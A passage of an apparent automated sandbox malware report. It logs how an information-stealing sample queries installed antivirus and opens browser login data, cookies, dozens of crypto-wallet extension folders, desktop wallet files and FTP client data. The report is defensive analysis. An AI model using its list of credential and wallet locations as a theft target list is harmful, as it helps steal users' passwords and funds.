                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000442008.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034658260.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035357975.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: jyidkjkfhjawd.exe PID: 7940, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1860268247.0000000001436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyne
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861189025.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1877860418.00000000013B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1860268247.0000000001436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: powershell.exe, 00000002.00000002.1708439334.0000000007070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
